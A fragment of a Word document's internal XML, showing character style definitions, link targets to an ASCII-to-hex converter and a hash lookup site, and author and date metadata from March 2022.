    <w:rsid w:val="00D53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53CE4"/>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00C91A8D"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EC06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0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rapidtables.com/convert/number/ascii-to-hex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hashes.com/en/decrypt/hash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12</Pages>
  <Words>1375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דאבוש</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>אורי דאבוש</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <cp:lastPrinted>2022-03-28T13:47:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-19T10:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-28T13:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>